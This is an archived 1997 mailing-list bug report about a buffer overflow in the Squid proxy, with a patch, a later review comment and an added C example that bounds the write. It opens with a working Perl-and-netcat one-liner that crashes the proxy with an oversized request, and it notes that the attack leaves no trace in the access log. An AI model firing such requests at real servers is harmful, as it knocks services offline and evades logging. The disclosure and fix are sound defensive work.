perl -e 'print "GET http://somehost.net/", ("\010" x 66000),"\n\n"' | netcat myhost 3128
Almost instant crash for squid-1.1.15 and .18 on Linux2.0.29 and FreeBSD2.2.5R
Lines from cache.log:
97/12/09 14:08:57| clientReadRequest: FD 23 Invalid Request
97/12/09 14:08:57| ERR_INVALID_REQUEST: GET http://____/^H^H^H^H^H^H^H^H^H^H^H
^^^ in fact, almost 66K "\010"s
97/12/09 14:08:57| WARNING: FD 23: A comm_write is already active.
FATAL: Received Segment Violation...dying.
97/12/09 14:08:57| storeWriteCleanLog: Starting...
97/12/09 14:08:57| 4096 lines written so far.
97/12/09 14:08:58| 8192 lines written so far.
97/12/09 14:08:58| 12288 lines written so far.
97/12/09 14:08:58| Finished. Wrote 13992 lines.
97/12/09 14:08:58| Took 1 seconds (13992.0 lines/sec).
CPU Usage: user 8 sys 5
It looks like squid dies in _db_print while trying to vsprintf a too-long line
into a BUFSIZ array.
While LOCAL_ARRAY expands to "static char f[BUFSIZ]" and not to a stack variable,
I wonder if it is possible to exploit this bug/feature and execute machine code
(even with non-root access).
There is no corresponding line in access.log, so this kind of attack
leaves no trace of the source address (please correct me if I'm wrong)
(default debug flags assumed)
Simple patch for .18 follows:
*** icp.c.orig Fri Oct 31 18:41:14 1997
--- icp.c Mon Dec 15 14:34:04 1997
***************
*** 1808,1813 ****
--- 1808,1816 ----
0);
} else {
/* parser returned -1 */
+ /* 15-12-97 chop wrong request to avoid buffer overflow */
+ if(strlen(icpState->inbuf) > 1024) icpState->inbuf[1023] = '\0';
+ /* now we're relatively safe to print diags */
debug(12, 1, "clientReadRequest: FD %d Invalid Request\n", fd);
wbuf = squid_error_request(icpState->inbuf,
ERR_INVALID_REQ,
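Review bot: the `> 1024` cap on `icpState->inbuf` is a hard-coded guess at the size of the buffer that actually overflows; the report itself places the crash in _db_print writing through vsprintf into a BUFSIZ array, BUFSIZ differs between platforms, and the logged line carries the `ERR_INVALID_REQUEST: ` prefix ahead of the request, so the limit should be derived from that buffer with headroom for the prefix, or better, the write should be bounded inside _db_print with vsnprintf so that every debug() caller is covered rather than only this path. Also, the chop modifies `inbuf` in place before `squid_error_request` receives it, so the error page returned to the client is truncated as well; if that is intended, the comment should say so.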
Received on Mon Dec 15 1997 - 04:22:07 MST
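As an added example that is not part of the original post or of Squid's source: a bounded stand-in for a _db_print-style helper that formats into a fixed BUFSIZ array, replacing the vsprintf the report blames with vsnprintf, and a check that replays the reported 66000-byte request into it. The function names are hypothetical.

```c
#include <stdarg.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Bounded stand-in for a _db_print-style helper (hypothetical name).
 * vsnprintf never writes past bufsz; returns the bytes stored (no NUL)
 * and sets *truncated when the message did not fit the array. */
static size_t safe_db_format(char *buf, size_t bufsz, int *truncated,
                             const char *fmt, ...)
{
    va_list ap;
    int n;

    *truncated = 0;
    if (bufsz == 0)
        return 0;
    va_start(ap, fmt);
    n = vsnprintf(buf, bufsz, fmt, ap);
    va_end(ap);
    if (n < 0) {            /* formatting error: leave an empty string */
        buf[0] = '\0';
        return 0;
    }
    if ((size_t)n >= bufsz) {   /* output was cut to fit the array */
        *truncated = 1;
        return bufsz - 1;
    }
    return (size_t)n;
}

/* Replays the reported input (66000 "\010" bytes, constructed here) into a
 * static BUFSIZ array; returns 1 if the write stayed inside and was cut. */
int log_oversized_request_is_bounded(void)
{
    static char f[BUFSIZ];
    char *req = malloc(66000 + 1);
    int truncated;
    size_t n;

    if (req == NULL)
        return 0;
    memset(req, '\010', 66000);
    req[66000] = '\0';
    n = safe_db_format(f, sizeof f, &truncated,
                       "ERR_INVALID_REQUEST: GET http://____/%s", req);
    free(req);
    return truncated && n == sizeof f - 1 && f[n] == '\0';
}
```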
This archive was generated by hypermail pre-2.1.9 : Tue Dec 09 2003 - 16:37:57 MST